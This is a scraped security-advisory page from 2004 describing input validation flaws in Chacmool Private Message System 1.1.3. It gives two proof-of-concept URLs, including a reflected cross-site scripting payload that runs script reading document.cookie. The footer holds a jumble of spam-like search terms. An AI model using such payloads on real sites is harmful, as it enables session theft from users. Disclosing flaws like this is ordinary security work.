about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Chacmool Private Message System Multiple Vulnerabilities


Title Chacmool Private Message System Multiple Vulnerabilities
Published 2004-11-12-12:00AM
Updated 2004-11-13-05:30PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to digital ex <dx_netsec@yahoo.com>.
Vulnerable  chacmool Private Message System 1.1.3
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/message_send.php?tid=%22><script>alert(document.cookie)</script>
http://www.example.com/message_send.php?quote=[ID]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 08:49:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
blufim c...s=103( strapon fe www .sexoc news for c www.yifa98 pus 200 /compo www.tamil www.trisha www.paomei news for c rcp sp2 .tjagaj news for c news for c www.ok148. Bigbutgirl news for c www.deyi98 mambo Remo WESTELL madoona www.89ebh. TAMIL ACTO SCHOOBOYSE WU-FTPD+6. Sac Yenirriber tutti lanka kwickfix.o Freexxxpor Linux 2.6. grsec www.url138 ray chat www.goxuns news for c public_inc blue flim D2-Shoutbo Travel.st SEXE MAROC karishmaka SCHOOBOYSE SEXE MAROC ISC Bind Girle sex news for c